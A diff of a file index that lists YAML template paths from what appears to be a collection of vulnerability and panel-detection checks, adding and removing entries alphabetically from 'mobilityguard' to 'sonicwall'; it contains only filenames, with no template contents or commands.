./poc/other/mobilityguard.yaml @@ -69346,7 +69315,6 @@ ./poc/other/mobiloud-mobile-app-plugin-931cb0a0c2d49a4fcb08eb9a70008663.yaml ./poc/other/mobiloud-mobile-app-plugin.yaml ./poc/other/mobotix-guest-camera-8909.yaml -./poc/other/mobotix-guest-camera-8910.yaml ./poc/other/mobotix-guest-camera-8911.yaml ./poc/other/mocho-blog-e13b353aaa431f280c28da9f0bbdf04d.yaml ./poc/other/mocho-blog.yaml @@ -69481,6 +69449,7 @@ ./poc/other/moodle-installer.yaml ./poc/other/moodle-version.yaml ./poc/other/moodle-workflow.yaml +./poc/other/moodle-workplace-panel.yaml ./poc/other/moodle.yaml ./poc/other/moolamojo-4a5381e97a7b85de3ad52f9a2500cf5a.yaml ./poc/other/moolamojo.yaml @@ -69696,6 +69665,7 @@ ./poc/other/mww-disclaimer-buttons-2bc9b412270e4ad800578c2b74dd4307.yaml ./poc/other/mww-disclaimer-buttons.yaml ./poc/other/mx-fingerprint-8973.yaml +./poc/other/mx-fingerprint.yaml ./poc/other/mx-time-zone-clocks-7bd50b385bef7806671d58586b378e1f.yaml ./poc/other/mx-time-zone-clocks.yaml ./poc/other/my-account-page-editor-a530c04b4f421bec58b0b53849cce90f.yaml @@ -69827,6 +69797,7 @@ ./poc/other/myscada-hmi.yaml ./poc/other/myshopkit-popup-smartbar-slidein-d9164dcbc0bd6c073327dad7eb0c4029.yaml ./poc/other/myshopkit-popup-smartbar-slidein.yaml +./poc/other/mystic-stealer.yaml ./poc/other/mystickyelements-068f3a1e907bacbb8c32875e5cdded5e.yaml ./poc/other/mystickyelements-736116124fd3c6e381fc84bf74542e23.yaml ./poc/other/mystickyelements-c5c0f62559021765f6248b7c8e746f20.yaml @@ -69873,6 +69844,7 @@ ./poc/other/name-directory.yaml ./poc/other/namedprocess-exporter-metrics.yaml ./poc/other/nameserver-fingerprint-8998.yaml +./poc/other/nameserver-fingerprint.yaml ./poc/other/narnoo-distributor-6a109c3f4899587084f43297ab267f54.yaml ./poc/other/narnoo-distributor.yaml ./poc/other/nat-gateway-usage.yaml @@ -69886,7 +69858,6 @@ ./poc/other/naturemag-lite.yaml ./poc/other/naver-map-670329480f4b1037ff65346c3e27fe97.yaml ./poc/other/naver-map.yaml -./poc/other/navicat-server-panel.yaml ./poc/other/navigation-menu-as-dropdown-widget-8c83804ea9c35973063f9f67c391c78b.yaml ./poc/other/navigation-menu-as-dropdown-widget.yaml ./poc/other/navis-documentcloud-3d113a5397e2241ac1dcbca54e02ed11.yaml @@ -69965,9 +69936,9 @@ ./poc/other/nerdgraph.yaml ./poc/other/neshan-maps-0f83b85af6f78c790d2f724ac050f84f.yaml ./poc/other/neshan-maps.yaml +./poc/other/nessus-panel-9017.yaml ./poc/other/nessus-panel-9018.yaml ./poc/other/nessus-panel-9019.yaml -./poc/other/nessus-panel-9020.yaml ./poc/other/nessus-panel.yaml ./poc/other/nessus.yaml ./poc/other/netapp-data-ontap.yaml @@ -69992,6 +69963,7 @@ ./poc/other/netis-info-leak-9034.yaml ./poc/other/netis-info-leak-9035.yaml ./poc/other/netis-info-leak-9036.yaml +./poc/other/netis-info-leak.yaml ./poc/other/netis-router-9038.yaml ./poc/other/netis-router.yaml ./poc/other/netmizer-log-management-system.yaml @@ -70015,7 +69987,6 @@ ./poc/other/netroics-blog-posts-grid-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/netroics-blog-posts-grid-plugin.yaml ./poc/other/netroics-blog-posts-grid.yaml -./poc/other/netscaler-gateway-9052.yaml ./poc/other/netscaler-gateway-9053.yaml ./poc/other/netscaler-gateway-9054.yaml ./poc/other/netscaler-gateway-9055.yaml @@ -70223,7 +70194,7 @@ ./poc/other/nextcellent-gallery-nextgen-legacy.yaml ./poc/other/nextcloud-install-9082.yaml ./poc/other/nextcloud-install-9083.yaml -./poc/other/nextcloud-install-9085.yaml +./poc/other/nextcloud-install-9084.yaml ./poc/other/nextcloud-install.yaml ./poc/other/nextcloud-product.yaml ./poc/other/nexter-5227ffca3ef1c90c0d7e62f00d632e7e.yaml @@ -70307,6 +70278,7 @@ ./poc/other/nexus-76c6b84ccd9f6bd60eada03675ff7bce.yaml ./poc/other/nexus-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/other/nexus-ff9293ba28748efa2ab9a2fe77385468.yaml +./poc/other/nexus-panel.yaml ./poc/other/nexus-repository-manager.yaml ./poc/other/nexus.yaml ./poc/other/ngi-diam4.yaml @@ -70318,7 +70290,6 @@ ./poc/other/ngo-charity-lite-theme.yaml ./poc/other/ngo-charity-lite.yaml ./poc/other/ngx_cache_purge.yaml -./poc/other/nh-c2.yaml ./poc/other/niagara-fox-info-enum.yaml ./poc/other/niagara-fox.yaml ./poc/other/nice-paypal-button-lite-753a7d6c4441623a4593a72b74f32082.yaml @@ -70490,9 +70461,7 @@ ./poc/other/ns-asg-file-read-9150.yaml ./poc/other/ns-asg-file-read-9151.yaml ./poc/other/ns-asg-file-read-9152.yaml -./poc/other/ns-asg-file-read-9153.yaml ./poc/other/ns-asg-file-read-9154.yaml -./poc/other/ns-asg-file-read.yaml ./poc/other/ns-asg-file-read.yml ./poc/other/ns-coupon-to-become-customer-7937a8d2d4473985a3f546f6a2747fbf.yaml ./poc/other/ns-coupon-to-become-customer.yaml @@ -70530,7 +70499,6 @@ ./poc/other/nuance.yaml ./poc/other/nuclei-openssl.yaml ./poc/other/nuclei.yaml -./poc/other/nuclei_template.yaml ./poc/other/nucleitemplate.yaml ./poc/other/nudgify-d57cce3802ae82efebf576ce81af5c65.yaml ./poc/other/nudgify.yaml @@ -70620,22 +70588,22 @@ ./poc/other/oi-yamaps.yaml ./poc/other/oik-e8f64d2d4f062faf73bc86e0f1f4518c.yaml ./poc/other/oik.yaml +./poc/other/oki-data-9223.yaml ./poc/other/oki-data-9224.yaml ./poc/other/oki-data-9225.yaml -./poc/other/oki-data-9226.yaml ./poc/other/oki-data.yaml +./poc/other/okiko-sfiler-portal-9227.yaml ./poc/other/okiko-sfiler-portal-9228.yaml ./poc/other/okiko-sfiler-portal-9229.yaml ./poc/other/okiko-sfiler-portal-9230.yaml ./poc/other/okiko-sfiler-portal.yaml -./poc/other/okta-panel-9231.yaml ./poc/other/okta-panel-9232.yaml ./poc/other/okta-panel-9233.yaml +./poc/other/okta-panel-9234.yaml ./poc/other/okta-panel.yaml ./poc/other/olat.yaml ./poc/other/old-copyright-9235.yaml ./poc/other/old-copyright-9236.yaml -./poc/other/old-copyright-9237.yaml ./poc/other/old-copyright-9238.yaml ./poc/other/old-copyright.yaml ./poc/other/oleggo-livestream-c4c586fb72f7fd2ad40a1c9aa9a1f9ea.yaml @@ -70712,8 +70680,8 @@ ./poc/other/onliner-multiple-bugs.yaml ./poc/other/onminutes-crm.yaml ./poc/other/oob-param-based-interaction-9251.yaml +./poc/other/oob-param-based-interaction-9252.yaml ./poc/other/oob-param-based-interaction-9253.yaml -./poc/other/oob-param-based-interaction.yaml ./poc/other/oob.yaml ./poc/other/ooohboi-steroids-for-elementor-032f1491fb2d29a2584f87045b366c72.yaml ./poc/other/ooohboi-steroids-for-elementor-c20df9e447e3e30f94d39c0822dcbb01.yaml @@ -70747,15 +70715,15 @@ ./poc/other/open-mjpg-streamer-9281.yaml ./poc/other/open-mjpg-streamer-9282.yaml ./poc/other/open-mjpg-streamer-9283.yaml -./poc/other/open-mjpg-streamer-9284.yaml ./poc/other/open-proxy-external.yaml ./poc/other/open-proxy-internal-9288.yaml -./poc/other/open-proxy-internal-9289.yaml +./poc/other/open-proxy-internal-9290.yaml ./poc/other/open-proxy-internal.yaml ./poc/other/open-proxy-localhost-9291.yaml ./poc/other/open-proxy-localhost-9292.yaml ./poc/other/open-proxy-localhost.yaml ./poc/other/open-proxy-portscan-9294.yaml +./poc/other/open-proxy-portscan-9295.yaml ./poc/other/open-proxy-portscan-9296.yaml ./poc/other/open-proxy-portscan.yaml ./poc/other/open-rdw-kenteken-voertuiginformatie-3752954a43659b9482b98a260268ba41.yaml @@ -70763,11 +70731,13 @@ ./poc/other/open-realty.yaml ./poc/other/open-user-map.yaml ./poc/other/open-virtualization-manager-panel-9327.yaml +./poc/other/open-virtualization-manager-panel-9328.yaml ./poc/other/open-virtualization-manager-panel.yaml ./poc/other/open-xchange.yaml ./poc/other/openai-phish.yaml ./poc/other/openam-panel.yaml ./poc/other/openam-workflow-9259.yaml +./poc/other/openam-workflow.yaml ./poc/other/openam.yaml ./poc/other/openbook-book-data-8b95fd8600abd1779ca1cfeb79845712.yaml ./poc/other/openbook-book-data.yaml @@ -70810,11 +70780,11 @@ ./poc/other/opensea.yaml ./poc/other/opensis-installer.yaml ./poc/other/opensis-panel.yaml -./poc/other/opensis-workflow-9319.yaml +./poc/other/opensis-workflow-9318.yaml +./poc/other/opensis-workflow.yaml ./poc/other/opensns-workflow.yaml ./poc/other/openssl.yaml ./poc/other/opentext-livesites.yaml -./poc/other/opentouch-multimediaservices-panel.yaml ./poc/other/openvas-panel.yaml ./poc/other/openvpn-admin.yaml ./poc/other/openvpn-connect.yaml @@ -70962,6 +70932,7 @@ ./poc/other/outdoor.yaml ./poc/other/outline.yaml ./poc/other/overlay-image-divi-module.yaml +./poc/other/overseerr-panel.yaml ./poc/other/ovic-addon-toolkit-0bfe8263900cccf6084930e68a01e8f9.yaml ./poc/other/ovic-addon-toolkit.yaml ./poc/other/ovic-product-bundle-c3702dcaa3ff54af14929a5b3cc2fc8e.yaml @@ -71016,7 +70987,6 @@ ./poc/other/package-quantity-xforwc-e7d05b0a2c85ee1ade7bf5ca69c912bf.yaml ./poc/other/package-quantity-xforwc.yaml ./poc/other/pacs-connexion-utilisateur-9424.yaml -./poc/other/pacs-connexion-utilisateur-9425.yaml ./poc/other/pacs-connexion-utilisateur-9426.yaml ./poc/other/pacs-connexion-utilisateur-9427.yaml ./poc/other/pacs-connexion-utilisateur.yaml @@ -71116,8 +71086,8 @@ ./poc/other/pagerestrict.yaml ./poc/other/pagespeed-global-admin-9431.yaml ./poc/other/pagespeed-global-admin-9432.yaml +./poc/other/pagespeed-global-admin-9433.yaml ./poc/other/pagespeed-global-admin-9434.yaml -./poc/other/pagespeed-global-admin-9435.yaml ./poc/other/pagespeed-global-admin.yaml ./poc/other/pageup-people.yaml ./poc/other/pagination-0b1ceb2c2f41aea6c15c37a10cde7ab2.yaml @@ -71128,7 +71098,6 @@ ./poc/other/pagination-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/pagination-plugin.yaml ./poc/other/pagination.yaml -./poc/other/pahtool-panel.yaml ./poc/other/paid-member-subscriptions-34a1971cc6f270818ec4d58e38d5658c.yaml ./poc/other/paid-member-subscriptions-7ba4fc9ed422423b7c3b615784aa1d6a.yaml ./poc/other/paid-member-subscriptions-80326f4bf14b4bafb945b51c58c714a8.yaml @@ -71177,12 +71146,12 @@ ./poc/other/paloalto-globalprotect.yaml ./poc/other/panabit-gateway.yaml ./poc/other/panabit-ixcache.yaml -./poc/other/panabit-panel-9445.yaml +./poc/other/panabit-panel-9444.yaml ./poc/other/panabit-panel.yaml ./poc/other/panalog-fileRead.yaml ./poc/other/panasonic-maintenance-utility.yaml ./poc/other/panasonic-network-management-9446.yaml -./poc/other/panasonic-network-management-9447.yaml +./poc/other/panasonic-network-management-9448.yaml ./poc/other/panasonic-network-management-9449.yaml ./poc/other/panasonic-network-management-9450.yaml ./poc/other/panda-pods-repeater-field-f8e576736f5c337207c9a8ede1b72e55.yaml @@ -71257,6 +71226,7 @@ ./poc/other/partdo-core-063ec1d04fd842700414b0ad7c1028af.yaml ./poc/other/partdo-core.yaml ./poc/other/partdo.yaml +./poc/other/passbolt-panel.yaml ./poc/other/past-events-extension-76c6b84ccd9f6bd60eada03675ff7bce.yaml ./poc/other/past-events-extension-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/other/past-events-extension-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -71394,6 +71364,7 @@ ./poc/other/pdf.yaml ./poc/other/pdf24-post-to-pdf.yaml ./poc/other/pdf24-posts-to-pdf.yaml +./poc/other/pdi-device-page.yaml ./poc/other/pdq-csv-01b678a59c250be17cfe85410e02fd6d.yaml ./poc/other/pdq-csv.yaml ./poc/other/pdw-file-browser-17fa95239468ce8080ab8af783bf4887.yaml @@ -71421,8 +71392,8 @@ ./poc/other/pegarules.yaml ./poc/other/penci-data-migrator.yaml ./poc/other/pendo.yaml +./poc/other/pentaho-panel-9481.yaml ./poc/other/pentaho-panel-9482.yaml -./poc/other/pentaho-panel-9483.yaml ./poc/other/pentaho-panel.yaml ./poc/other/pentaho-workflow.yaml ./poc/other/pepro-ultimate-invoice-415bafee9b870aaa5ec705656e9ae7f8.yaml @@ -71784,6 +71755,7 @@ ./poc/other/plausible-analytics-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/plausible-analytics-plugin.yaml ./poc/other/plausible-analytics.yaml +./poc/other/plausible-panel.yaml ./poc/other/play-ht-3c219350e35b8705870cb2eb15af2d3b.yaml ./poc/other/play-ht-47b573c976893fe184436d253e8fb414.yaml ./poc/other/play-ht-fde423113abea7735d1cebd7bbaa88d4.yaml @@ -71809,19 +71781,18 @@ ./poc/other/pldsec-统一安全管理和综合审计系统.yaml ./poc/other/plerdy-heatmap-b0bd4af414ed0c61a6b55b28713a79bc.yaml ./poc/other/plerdy-heatmap.yaml -./poc/other/plesk-obsidian-9594.yaml ./poc/other/plesk-obsidian-9595.yaml ./poc/other/plesk-obsidian-9596.yaml ./poc/other/plesk-obsidian-9597.yaml ./poc/other/plesk-obsidian.yaml -./poc/other/plesk-onyx-9598.yaml ./poc/other/plesk-onyx-9599.yaml ./poc/other/plesk-onyx-9600.yaml +./poc/other/plesk-onyx-9601.yaml ./poc/other/plesk-onyx.yaml ./poc/other/plesk-plesk-onyx.yaml ./poc/other/plesk-stat-9602.yaml ./poc/other/plesk-stat-9603.yaml -./poc/other/plesk-stat-9604.yaml +./poc/other/plesk-stat.yaml ./poc/other/plezi-4a80cd5a954b8f2bb72aeed6f12b185b.yaml ./poc/other/plezi.yaml ./poc/other/plg_novana-1c2cea013210e5c90b176a13485e2663.yaml @@ -71846,6 +71817,7 @@ ./poc/other/plugin-logic.yaml ./poc/other/plugin-newsletter-e40581f611ffe73a6f20ba9a12cd0a0d.yaml ./poc/other/plugin-newsletter.yaml +./poc/other/plugin.yaml ./poc/other/plugins-list-b73d4af128c6eea440ef7c3187315bc8.yaml ./poc/other/plugins-list-f0270b9471517b9d996fdf18e804bc95.yaml ./poc/other/plugins-list.yaml @@ -72106,10 +72078,10 @@ ./poc/other/popups.yaml ./poc/other/portainer-init-deploy-9628.yaml ./poc/other/portainer-init-deploy-9629.yaml -./poc/other/portainer-init-deploy-9630.yaml ./poc/other/portainer-init-deploy-9631.yaml ./poc/other/portainer-init-deploy-9632.yaml ./poc/other/portainer-init-deploy-9633.yaml +./poc/other/portainer-init-deploy.yaml ./poc/other/portainer-panel.yaml ./poc/other/portainer.yaml ./poc/other/portfolio-82a29985ba6c170976940ebd73e10b7d.yaml @@ -72352,7 +72324,6 @@ ./poc/other/post-views.yaml ./poc/other/postaffiliatepro-9ed24bf70201233fb5c59de83955e65e.yaml ./poc/other/postaffiliatepro.yaml -./poc/other/posteio-admin-panel.yaml ./poc/other/posterous.yaml ./poc/other/posthog-admin-panel.yaml ./poc/other/postie-37af4fad5c12509e72c1ef2660c11a10.yaml @@ -72375,9 +72346,9 @@ ./poc/other/postmatic-bae291c7c3485f8a23c0bba03494b780.yaml ./poc/other/postmatic-c5364a6d911d0e930680d39522fc7662.yaml ./poc/other/postmatic.yaml -./poc/other/postmessage-outgoing-tracker-9634.yaml ./poc/other/postmessage-outgoing-tracker-9635.yaml ./poc/other/postmessage-outgoing-tracker-9636.yaml +./poc/other/postmessage-outgoing-tracker.yaml ./poc/other/postmessage-tracker-9637.yaml ./poc/other/postmessage-tracker-9638.yaml ./poc/other/postmessage-tracker-9639.yaml @@ -72423,8 +72394,8 @@ ./poc/other/powerkit-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/powerkit-plugin.yaml ./poc/other/powerkit.yaml -./poc/other/powerlogic-ion-9648.yaml ./poc/other/powerlogic-ion-9649.yaml +./poc/other/powerlogic-ion-9650.yaml ./poc/other/powerlogic-ion.yaml ./poc/other/powermta.yaml ./poc/other/powerpack-addon-for-beaver-builder-2deab7296758bc872a1e7e3e3fb52e28.yaml @@ -72798,14 +72769,14 @@ ./poc/other/prolist-theme.yaml ./poc/other/prolist.yaml ./poc/other/promail.yaml -./poc/other/prometheus-exporter-9678.yaml +./poc/other/prometheus-exporter-9677.yaml +./poc/other/prometheus-exporter.yaml +./poc/other/prometheus-flags-9687.yaml ./poc/other/prometheus-flags-endpoint-9685.yaml ./poc/other/prometheus-flags-endpoint-9686.yaml ./poc/other/prometheus-flags-endpoint.yaml -./poc/other/prometheus-flags.yaml ./poc/other/prometheus-log.yaml ./poc/other/prometheus-targets-9690.yaml -./poc/other/prometheus-targets-9691.yaml ./poc/other/prometheus-targets-9692.yaml ./poc/other/prometheus-targets-endpoint-9688.yaml ./poc/other/prometheus-targets-endpoint-9689.yaml @@ -72860,10 +72831,10 @@ ./poc/other/protected-posts-logout-button.yaml ./poc/other/proton-phish.yaml ./poc/other/prototype-pollution-check-9697.yaml -./poc/other/prototype-pollution-check-9699.yaml +./poc/other/prototype-pollution-check-9698.yaml ./poc/other/prototype-pollution-check.yaml ./poc/other/provider-path-9700.yaml -./poc/other/provider-path-9702.yaml +./poc/other/provider-path-9701.yaml ./poc/other/provider-path.yaml ./poc/other/proxmox-panel.yaml ./poc/other/proxmox-ve.yaml @@ -72876,6 +72847,7 @@ ./poc/other/pt-elementor-addons-lite-plugin.yaml ./poc/other/pt-elementor-addons-lite.yaml ./poc/other/ptr-fingerprint-9707.yaml +./poc/other/ptr-fingerprint.yaml ./poc/other/ptypeconverter-de0336e587f9f6b9a860440eebc3c601.yaml ./poc/other/ptypeconverter.yaml ./poc/other/public-documents.yaml @@ -72903,6 +72875,7 @@ ./poc/other/pulsar-admin-console.yaml ./poc/other/pulsar-adminui-panel.yaml ./poc/other/pulsar360-admin-panel.yaml +./poc/other/pulse-secure-panel-9712.yaml ./poc/other/pulse-secure-panel-9713.yaml ./poc/other/pulse-secure-panel-9714.yaml ./poc/other/pulse-secure-panel-9715.yaml @@ -72936,10 +72909,9 @@ ./poc/other/push-notification-for-post-and-buddypress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/push-notification-for-post-and-buddypress-plugin.yaml ./poc/other/push-notification-for-post-and-buddypress.yaml -./poc/other/put-m-enb.yaml ./poc/other/put-method-enabled-9726.yaml +./poc/other/put-method-enabled-9727.yaml ./poc/other/put-method-enabled-9728.yaml -./poc/other/put-method-enabled.yaml ./poc/other/putMethod-1.yaml ./poc/other/putMethod-2.yaml ./poc/other/putmethod-1.yaml @@ -72951,6 +72923,7 @@ ./poc/other/py_settings.yaml ./poc/other/pygopherd.yaml ./poc/other/pyload-panel.yaml +./poc/other/pypicloud-panel-9733.yaml ./poc/other/pypicloud-panel-9734.yaml ./poc/other/pypicloud-panel.yaml ./poc/other/pypiserver.yaml @@ -72991,7 +72964,9 @@ ./poc/other/qdpm-info-leak-9750.yaml ./poc/other/qdpm-info-leak-9751.yaml ./poc/other/qdpm-info-leak-9752.yaml +./poc/other/qdpm-info-leak-9753.yaml ./poc/other/qdpm-info-leak-9754.yaml +./poc/other/qdpm-info-leak.yaml ./poc/other/qe-seo-handyman-41cf2b5091a855715a41f6fd63cde04c.yaml ./poc/other/qe-seo-handyman-478c02c6c55f7c262f68d1ab8607d6af.yaml ./poc/other/qe-seo-handyman.yaml @@ -73267,7 +73242,7 @@ ./poc/other/r-seenet-workflow.yaml ./poc/other/rabbit-loader-c82cb72a96a7e8a44e3fa4554cd33e13.yaml ./poc/other/rabbit-loader.yaml -./poc/other/race-multiple.yaml +./poc/other/race-simple.yaml ./poc/other/rack-mini-profiler-9788.yaml ./poc/other/rack-mini-profiler-9789.yaml ./poc/other/rack-mini-profiler-9790.yaml @@ -73297,8 +73272,8 @@ ./poc/other/radius-manager-2.yaml ./poc/other/radius-manager-3.yaml ./poc/other/radius-manager-4.yaml +./poc/other/radius-manager-9794.yaml ./poc/other/radius-manager-9795.yaml -./poc/other/radius-manager-9796.yaml ./poc/other/radius-manager.yaml ./poc/other/radware-appwall.yaml ./poc/other/radykal-fancy-gallery-45e420ead424144a445b4de1d53ba71a.yaml @@ -73379,6 +73354,7 @@ ./poc/other/ravpage-b5a51590524092b47fea1bc58ca48251.yaml ./poc/other/ravpage.yaml ./poc/other/raw-get-query.yaml +./poc/other/raw-get.yaml ./poc/other/raw-path-trailing-slash.yaml ./poc/other/raw-payload.yaml ./poc/other/raw-post-body.yaml @@ -73616,6 +73592,7 @@ ./poc/other/recommended-products-edd-ff5c5c08fe6c05ca7e401ff36575ed62.yaml ./poc/other/recommended-products-edd.yaml ./poc/other/recommended.yml +./poc/other/red-lion-panel.yaml ./poc/other/redash-installer.yaml ./poc/other/redash-panel.yaml ./poc/other/redcap-install-module(1).yaml @@ -73806,7 +73783,8 @@ ./poc/other/request-a-quote-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/request-a-quote-plugin.yaml ./poc/other/request-a-quote.yaml -./poc/other/request-based-interaction-9863.yaml +./poc/other/request-based-interaction-9862.yaml +./poc/other/request-based-interaction.yaml ./poc/other/request-condition-new.yaml ./poc/other/request-condition.yaml ./poc/other/require-taxonomy-image-category-tag-3e080442bb85e7ac2ae95bab3a10f941.yaml @@ -73843,14 +73821,15 @@ ./poc/other/resim-ara-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/resim-ara-plugin.yaml ./poc/other/resim-ara.yaml -./poc/other/resin-inputfile-fileread-9868.yaml ./poc/other/resin-inputfile-fileread-9869.yaml +./poc/other/resin-inputfile-fileread-9870.yaml ./poc/other/resin-inputfile-fileread-9871.yaml ./poc/other/resin-viewfile-fileread.yaml ./poc/other/resin-viewfile-fileread.yml ./poc/other/resin-viewfile-lfr-9872.yaml ./poc/other/resin-viewfile-lfr-9873.yaml ./poc/other/resin-viewfile-lfr-9875.yaml +./poc/other/resin-viewfile-lfr.yaml ./poc/other/resmushit-image-optimizer-55e816cb631a172f3433d28be371bf4d.yaml ./poc/other/resmushit-image-optimizer-8e138d835c51d3c6720b941fe121d84e.yaml ./poc/other/resmushit-image-optimizer-949bb7e530ea361fdff18bd3807a94ad.yaml @@ -74206,7 +74185,7 @@ ./poc/other/robots-9887.yaml ./poc/other/robots-9889.yaml ./poc/other/robots-txt-9886.yaml -./poc/other/robots-txt-9890.yaml +./poc/other/robots-txt-9888.yaml ./poc/other/robots-txt-endpoint.yaml ./poc/other/robots-txt.yaml ./poc/other/robots.txt.yaml @@ -74405,6 +74384,7 @@ ./poc/other/ruijie-cloud.yaml ./poc/other/ruijie-eg-file-read.yaml ./poc/other/ruijie-eg-file-read.yml +./poc/other/ruijie-eg-filedown.yaml ./poc/other/ruijie-eg-info-leak.yml ./poc/other/ruijie-eg易网关.yaml ./poc/other/ruijie-it.yaml @@ -74700,7 +74680,7 @@ ./poc/other/scrollsequence.yaml ./poc/other/scs-landfill-control-10095.yaml ./poc/other/scs-landfill-control-10096.yaml -./poc/other/scs-landfill-control-10098.yaml +./poc/other/scs-landfill-control-10097.yaml ./poc/other/scs-landfill-control.yaml ./poc/other/scv1-119cdc16fe916df3add67c8763d4fc01.yaml ./poc/other/scv1-31fa1f0e3c61b1f050d66cb517e56e41.yaml @@ -74767,13 +74747,13 @@ ./poc/other/secure-html5-video-player.yaml ./poc/other/securemoz-security-audit-5934c9784ef1b47d3135045450f457ae.yaml ./poc/other/securemoz-security-audit.yaml -./poc/other/securenvoy-panel-10114.yaml ./poc/other/securenvoy-panel-10115.yaml +./poc/other/securenvoy-panel-10116.yaml ./poc/other/securenvoy-panel.yaml -./poc/other/securepoint-utm-10117.yaml +./poc/other/securepoint-utm-10118.yaml ./poc/other/securepoint-utm.yaml ./poc/other/security-10122.yaml -./poc/other/security-10123.yaml +./poc/other/security-10124.yaml ./poc/other/security-intelligent-management-platform.yaml ./poc/other/security-malware-firewall-45c526c3982a209b165f42c75f6d6d27.yaml ./poc/other/security-malware-firewall-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -74809,7 +74789,6 @@ ./poc/other/selea-ip-camera-10133.yaml ./poc/other/selea-ip-camera-10134.yaml ./poc/other/selea-ip-camera-10135.yaml -./poc/other/selea-ip-camera-10136.yaml ./poc/other/selea-ip-camera.yaml ./poc/other/selea-targa-camera-read-file.yaml ./poc/other/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons-eca8b18a10526011571b2fa3e9fc94f6.yaml @@ -74820,6 +74799,7 @@ ./poc/other/self-contained.yaml ./poc/other/self-signed-cert.yaml ./poc/other/self-signed-ssl.yaml +./poc/other/selfcheck-panel.yaml ./poc/other/selio-47217d68dcdf61df30873286a6bbc681.yaml ./poc/other/selio-4a816a5156ab7c9cc5ec9ab45afebe2d.yaml ./poc/other/selio-5ace739a5952774d63f1bf788e169f28.yaml @@ -75040,7 +75020,7 @@ ./poc/other/server-status-by-hostnameip.yaml ./poc/other/server-status-localhost-10163.yaml ./poc/other/server-status-localhost-10164.yaml -./poc/other/server-status-localhost-10165.yaml +./poc/other/server-status-localhost-10166.yaml ./poc/other/server-status-localhost.yaml ./poc/other/servfail-refused-hosts-10167.yaml ./poc/other/servfail-refused-hosts-10168.yaml @@ -75166,9 +75146,9 @@ ./poc/other/shell-history-1.yaml ./poc/other/shell-history-10191.yaml ./poc/other/shell-history-10192.yaml -./poc/other/shell-history-10193.yaml ./poc/other/shell-history-2.yaml ./poc/other/shell-history-3.yaml +./poc/other/shell-history.yaml ./poc/other/shell_scripts.yaml ./poc/other/shells.yaml ./poc/other/shellscripts-1.yaml @@ -75392,10 +75372,10 @@ ./poc/other/sidebar-manager.yaml ./poc/other/sideblog-de06c6cd776a8d198247303108ff7a16.yaml ./poc/other/sideblog.yaml -./poc/other/sidekiq-dashboard-10235.yaml ./poc/other/sidekiq-dashboard-10236.yaml ./poc/other/sidekiq-dashboard-10237.yaml ./poc/other/sidekiq-dashboard-10238.yaml +./poc/other/sidekiq-dashboard-10239.yaml ./poc/other/sidekiq-dashboard.yaml ./poc/other/sidekiq-workflow.yaml ./poc/other/signal-phish.yaml @@ -75428,6 +75408,7 @@ ./poc/other/signatures-10265.yaml ./poc/other/signatures-10266.yaml ./poc/other/signatures-10267.yaml +./poc/other/signatures-10268.yaml ./poc/other/signatures-10269.yaml ./poc/other/signatures-10270.yaml ./poc/other/signatures.yaml @@ -75970,7 +75951,6 @@ ./poc/other/sitemap-by-click5-bb55523a8065ab01450d6332a0f9b83d.yaml ./poc/other/sitemap-by-click5.yaml ./poc/other/sitemap-index.yaml -./poc/other/sitemap.yaml ./poc/other/siteminderagent.yaml ./poc/other/siteorigin-panels-0c18557898a1d94d25aeb04bcb7e7891.yaml ./poc/other/siteorigin-panels-20b6552057669c22e92f742a513eab73.yaml @@ -76006,8 +75986,8 @@ ./poc/other/sky-elementor-addons-a77d646b0ca65be83cef4a1196433a63.yaml ./poc/other/sky-elementor-addons.yaml ./poc/other/sky-phish.yaml -./poc/other/skycaiji-admin-panel-10304.yaml ./poc/other/skycaiji-admin-panel-10305.yaml +./poc/other/skycaiji-admin-panel-10306.yaml ./poc/other/skycaiji-admin-panel.yaml ./poc/other/skycaiji-install-10308.yaml ./poc/other/skycaiji-install-10309.yaml @@ -76342,7 +76322,6 @@ ./poc/other/soft78-system.yaml ./poc/other/softbiz-online-auctions-script.yaml ./poc/other/softbiz-online-classifieds.yaml -./poc/other/softether-vpn-panel.yaml ./poc/other/softether-vpn.yaml ./poc/other/softnext-spam-sqr反垃圾邮件系统.yaml ./poc/other/softnext-spam.yaml @@ -76367,8 +76346,8 @@ ./poc/other/solarview-compact-panel.yaml ./poc/other/solarview-compact.yaml ./poc/other/solarwinds-arm-panel.yaml +./poc/other/solarwinds-orion-10357.yaml ./poc/other/solarwinds-orion-10358.yaml -./poc/other/solarwinds-orion-10359.yaml ./poc/other/solarwinds-orion-panel.yaml ./poc/other/solarwinds-orion-workflow.yaml ./poc/other/solarwinds-orion.yaml @@ -76393,18 +76372,19 @@ ./poc/other/solr-admin-query.yaml ./poc/other/solr-file-read.yaml ./poc/other/solr-fileRead.yaml +./poc/other/solr-fileread.yaml ./poc/other/solr-fileread.yml ./poc/other/solr-query-dashboard-1.yaml ./poc/other/solr-query-dashboard-10367.yaml +./poc/other/solr-query-dashboard-10368.yaml ./poc/other/solr-query-dashboard-10369.yaml ./poc/other/solr-query-dashboard-10370.yaml ./poc/other/solr-query-dashboard-2.yaml -./poc/other/solr-query-dashboard.yaml ./poc/other/solr-workflow.yaml ./poc/other/some-PIIs.yaml ./poc/other/sonarcloud.yaml +./poc/other/sonarqube-public-projects-10377.yaml ./poc/other/sonarqube-public-projects-10378.yaml -./poc/other/sonarqube-public-projects-10379.yaml ./poc/other/sonarqube-public-projects.yaml ./poc/other/sonarqube-workflow.yaml ./poc/other/sonarqube.yaml @@ -76414,13 +76394,14 @@ ./poc/other/sonicwall-management-panel.yaml ./poc/other/sonicwall-shellshock-vulnerability.yaml ./poc/other/sonicwall-ssl-vpn.yaml +./poc/other/sonicwall-sslvpn-panel-10388.yaml ./poc/other/sonicwall-sslvpn-panel-10389.yaml -./poc/other/sonicwall-sslvpn-panel-10390.yaml ./poc/other/sonicwall-sslvpn-panel.yaml 